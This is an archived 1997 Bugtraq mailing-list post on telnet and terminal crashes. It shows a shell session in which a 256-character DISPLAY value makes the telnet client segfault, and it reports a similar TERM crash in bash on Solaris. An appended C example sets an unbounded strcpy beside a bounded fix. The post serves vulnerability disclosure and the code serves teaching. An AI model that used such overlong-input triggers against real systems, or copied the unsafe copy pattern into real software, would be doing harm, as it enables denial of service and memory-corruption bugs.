Bugtraq mailing list archives
More telnet Daemon Fun
From: aaron () ug cs dal ca (Aaron Campbell)
Date: Mon, 1 Dec 1997 22:29:21 -0400
Regarding user-supplied terminfo files...

|autopsy!user52810 () AZRAEL DWEEBS NET| suggested this feature, as found in
the terminfo man page, might be maliciously used in a custom terminfo file:

    -np    Number of pages of memory    c100-4p

Possible to crash a machine using this? Anyone?

Thanks to Jason Parsons <root () saffroncs com> for pointing this one out:

[fx@somehost fx]$ export DISPLAY=""
[fx@somehost fx]$ telnet .
Trying 0.0.0.0...
Connected to ..
Escape character is '^]'.

Red Hat Linux release 4.2 (Biltmore)
Kernel 2.0.30 on an i586
login:
telnet> send esc
telnet> quit
Connection closed.
[fx@somehost fx]$ export DISPLAY="1234567890123456789012345678901234567890123
45678901234567890123456789012345678901234567890123456789012345678901234567890
12345678901234567890123456789012345678901234567890123456789012345645678901234
56789012345678901234567890123456789012345678901234567890123456"
[fx@somehost fx]$ telnet .
Trying 0.0.0.0...
Connected to ..
Escape character is '^]'.
Segmentation fault (core dumped)
[fx@somehost fx]$ ls -l core
-rw-------   1 fx       nnh        315392 Dec  1 21:51 core
[fx@somehost fx]$

That's 256 characters up there, BTW. Also, note we're setting the DISPLAY
variable this time, not TERM.

Lastly, while doing some testing, I discovered that setting my TERM variable to
a 256-character string under Solaris 2.5.1 caused my bash shell session to
crash, dump core and log me out. This may or may not have been mentioned on
Bugtraq before, and may or may not be due to missing patches. Pardon my
vagueness, but I've been swamped lately and really don't have much time to
explore these problems in more detail.

Aaron Campbell
Dalhousie University, Halifax, NS
[fx!aaron () ug cs dal ca]
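The crash pattern in the post (an empty DISPLAY is fine, a 256-character one segfaults the client) is the classic unbounded copy of an environment variable into a fixed-size buffer. The following is an added illustration, not the telnet or bash source discussed above: it shows the unsafe pattern next to a bounded replacement, and assumes a 256-byte buffer (chosen to match the 256-character trigger) and a constructed 256-digit value.

```c
/* Added example: fixed-size buffer copy of an environment variable such as
 * DISPLAY or TERM, unsafe pattern beside a bounded one.  Illustrative code,
 * not taken from the telnet client of the original post. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ENV_BUF 256   /* assumed buffer size; room for 255 chars + NUL */

/* Unsafe pattern: strcpy() writes strlen(src)+1 bytes with no bound, so a
 * value of 256 or more characters runs past a 256-byte buffer.  Only ever
 * called here with a short value so the demo itself does not overflow. */
static void copy_env_unsafe(char *dst, const char *src) {
    strcpy(dst, src);   /* no length check: this is the bug */
}

/* Report whether the unsafe copy would overrun a buffer of buflen bytes.
 * Returns 1 when it would, 0 when it fits (NUL included). */
int unsafe_copy_would_overflow(const char *src, size_t buflen) {
    return src != NULL && strlen(src) + 1 > buflen;
}

/* Hardened: bounded copy.  Returns 0 on success (dst holds the value, or ""
 * when the variable is unset) and -1 when the value is rejected as too long;
 * rejecting is preferred over silent truncation, which can change meaning. */
int copy_env_safe(char *dst, size_t dstlen, const char *src) {
    if (dst == NULL || dstlen == 0) return -1;
    dst[0] = '\0';
    if (src == NULL) return 0;           /* unset variable: empty string */
    size_t n = strlen(src);
    if (n >= dstlen) return -1;          /* no room for the terminating NUL */
    memcpy(dst, src, n + 1);
    return 0;
}

/* What a client should do when reading DISPLAY from its environment. */
int load_display(char *dst, size_t dstlen) {
    return copy_env_safe(dst, dstlen, getenv("DISPLAY"));
}

int main(void) {
    char buf[ENV_BUF];
    char longval[ENV_BUF + 1];
    memset(longval, '1', ENV_BUF);       /* constructed 256-character value */
    longval[ENV_BUF] = '\0';
    copy_env_unsafe(buf, "host:0");      /* short value: fits either way */
    printf("empty DISPLAY overflows 256-byte buffer:    %d\n", unsafe_copy_would_overflow("", ENV_BUF));
    printf("256-char DISPLAY overflows 256-byte buffer: %d\n", unsafe_copy_would_overflow(longval, ENV_BUF));
    printf("bounded copy of 256-char value returns:     %d\n", copy_env_safe(buf, sizeof buf, longval));
    return 0;
}
```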